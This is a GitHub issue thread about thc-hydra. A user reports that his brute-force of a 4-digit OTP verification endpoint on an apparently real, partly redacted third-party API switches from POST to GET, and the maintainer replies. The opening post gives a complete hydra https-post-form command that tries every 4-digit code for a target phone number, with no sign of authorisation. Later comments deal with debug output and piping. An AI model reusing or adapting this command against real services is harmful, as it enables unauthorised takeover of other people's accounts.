### ISSUE TITLE
thc-hydra making GET request instead of POST request after some time.

### ISSUE THREAD

**Issue by XaNaNtX** [vanhauser-thc/thc-hydra#733]
I've been trying to bypass 4 digit OTP verification. But thc-hydra started making GET request instead of POST after sometime and that's why server gives me "405 Method Note Allowed".
And also Is there is any way to handle 403 forbidden?
You can check your own with your phone number (tell me if you want).
So I've attached some text file from thc-hydra's stdout by redirecting.

`hydra -I -d -l 123XXXX890 -x 4:4:1 -vV -t 64 -f api.ge**********w.com https-post-form "/v3/user/verify-otp/:{\"client_id\"\:\"XY****Z\",\"client_secret\"\:\"XYZ**********vW\",\"code\"\:\"^PASS^\",\"phone\"\:\"^USER^\"}:H=x-platform: 5:H=device-id: foobar:H=Content-Type:application/json:H=User-Agent:okhttp/4.9.1:F=incorrect"`

**Comment by vanhauser-thc** [comment]
HTTP form stuff can be so different that not every weirdness is supported.
for your case you would need to change the source code, but that is an easy thing to do for your purposes if you know some basic C.

**Comment by XaNaNtX** [comment]
Wow, everything is working fine ;). Great program you make. 🥰 
But I've problem , why `hydra` prints DEBUG lines while i use piping with `grep`?
Like : 

```
hydra .... ... | grep 'x'
[DEBUG] ... ...... .. .. . .
[DEBUG] .. ...... ... ....
[DEBUG] .... .. ... .... ..
```
I had to use `sed` :(
It also prints other VERBOSE and INFO etc lines.

**Comment by vanhauser-thc** [comment]
well debug mode is for.... debugging :)
if you dont want debug output, dont specify it ... (-d enables debug)

**Comment by XaNaNtX** [comment]
No, i didn't use -d -v options still I get these lines **while piping**

**Comment by vanhauser-thc** [comment]
can you please paste example lines you get?
but seriously if there is output you are not interested just `egrep -v ...` ....

**Comment by XaNaNtX** [comment]
oh my mistake. It happened by `fprintf stderr`. I edited it and everything is cleaned. Yay!!!
